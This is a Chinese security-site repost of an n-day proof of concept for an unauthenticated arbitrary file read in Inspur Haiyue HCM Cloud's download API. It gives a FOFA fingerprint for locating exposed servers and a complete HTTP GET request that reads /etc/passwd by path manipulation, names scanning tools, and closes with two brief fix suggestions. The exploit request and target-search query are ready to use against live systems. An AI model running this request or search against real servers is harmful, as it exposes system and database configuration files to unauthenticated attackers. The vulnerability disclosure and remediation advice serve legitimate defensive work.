浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

admin 2024年11月8日12:59:56评论16 views字数 776阅读2分35秒阅读模式
00

产品简介
浪潮海岳 HCM Cloud 5.0采用新一代技术领先的云计算微服务技术架构,利用低代码扩展开发平台,面向生态搭建人力资源管理体系,实现集中管控、分级管控、共享服务三种管控模式和全自研业务模块完整覆盖,助推“世界一流”人力资源管理体系落地。

01
漏洞概述
浪潮海岳 HCM Cloud download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

02
搜索引擎
FOFA: 
icon_hash="-859381597"

浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

03
漏洞复现
GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

04
检测工具

nuclei

浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

afrog

浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

xray

浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoC

05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

原文始发于微信公众号(nday POC):浪潮海岳 HCM Cloud download 任意文件读取漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日12:59:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浪潮海岳 HCM Cloud download 任意文件读取漏洞 PoChttps://cn-sec.com/archives/3372984.html

发表评论

匿名网友 填写信息